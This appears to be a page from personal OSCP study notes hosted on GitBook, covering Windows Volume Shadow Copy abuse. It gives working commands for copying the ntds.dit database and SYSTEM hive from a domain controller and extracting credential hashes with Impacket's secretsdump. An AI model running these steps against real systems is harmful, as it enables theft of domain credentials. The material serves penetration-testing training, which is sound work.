🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  1. Windows
  2. Persistence

Shadow Copy

Shadow Copy A.K.A Volume Shadow Copy Service (VSS) in Windows is a feature that creates backup snapshots of files or entire volumes while they are in use. Originally designed for quick backups and to enable file versioning in case of accidental deletion or data corruption.

Attackers often leverage this feature to access sensitive files, like the NTDS database, which contains user credentials, without alerting security systems.

Note: shadow copy requires Administrative or SYSTEM Privileges

Steps for shadow copy:

  1. Create a Shadow Copy.

vshadow.exe -nw -p  C:

  1. Copy ntds.dit file.

copy <shadow_path>\windows\ntds\ntds.dit c:\ntds.dit.bak

  1. Export the SYSTEM Hive - necessary for decrypting NTDS hashes.

reg save hklm\system c:\system.bak

  1. Extract hashes Finally using Impacket’s secretsdump.

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

PreviousGolden TicketNextAuthentication Attacks

Last updated 7 months ago